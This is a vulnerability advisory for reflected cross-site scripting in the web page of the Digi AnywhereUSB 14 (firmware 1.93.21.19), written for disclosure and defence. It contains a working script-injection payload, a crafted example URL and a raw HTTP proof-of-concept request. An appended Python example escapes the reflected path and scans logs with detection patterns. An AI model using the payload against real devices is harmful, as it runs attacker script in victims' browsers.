Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
Vendor of Product: Digi International
Affected Product Code Base: AnywhereUSB - 14
Firmware Version: 1.93.21.19
Description: Digi AnywhereUSB 14 allows XSS via a link for the Digi Page.
Attack Vectors: The victim must open a crafted link to the Digi Page
Attack Type: Remote
Payload: //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Steps To Reproduce
1. Browse to the web page of the Digi AnywhereUSB without logging in.
2. Craft a payload like the one below; opening the resulting link runs arbitrary JavaScript in the victim's browser.
Example: http://<IP Address of the Digi Anywhere USB>///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
#PoC
GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
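As an added defender-side example (not part of the advisory and not Digi's code), the following Python contrasts a hypothetical page handler that reflects the request path verbatim with one that HTML-escapes it, and scans constructed access-log lines for the advisory's payload. The template, the handler names and the log lines are assumptions made for the illustration.

```python
import html
import re
from urllib.parse import unquote

# Payload from the advisory, used here as test input (constructed reproduction, not Digi's code).
PAYLOAD = "//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>"

# Hypothetical page template that reflects the requested path in two HTML contexts.
TEMPLATE = '<html><body><p>Requested: {path}</p><a href="{path}">Digi Page</a></body></html>'


def render_unsafe(path: str) -> str:
    """Reflects the path verbatim: the advisory's payload closes the tag and injects <SCRIPT>."""
    return TEMPLATE.format(path=path)


def render_safe(path: str) -> str:
    """Hardened variant: HTML-escape the path, including quotes, before reflecting it."""
    return TEMPLATE.format(path=html.escape(path, quote=True))


# Heuristic markers for script injection in a URL-decoded request target.
SCRIPT_MARKERS = re.compile(r"<\s*/?\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)
# Request portion of a Common Log Format line: "METHOD target HTTP/x.y".
CLF_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines: one benign request, one carrying the advisory's payload (URL-encoded).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2019:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2019:12:00:01 +0000] "GET /%2F%2F--%3E%3C/SCRIPT%3E%22%3E%27%3E'
    '%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E HTTP/1.1" 200 1024',
]


def flagged_targets(log_lines):
    """Return the URL-decoded request targets that match the script-injection markers."""
    hits = []
    for line in log_lines:
        match = CLF_REQUEST.search(line)
        if not match:
            continue  # malformed or non-CLF line: skip it rather than crash
        target = unquote(match.group("target"))
        if SCRIPT_MARKERS.search(target):
            hits.append(target)
    return hits


if __name__ == "__main__":
    print(render_safe(PAYLOAD))
    print(flagged_targets(SAMPLE_LOG))
```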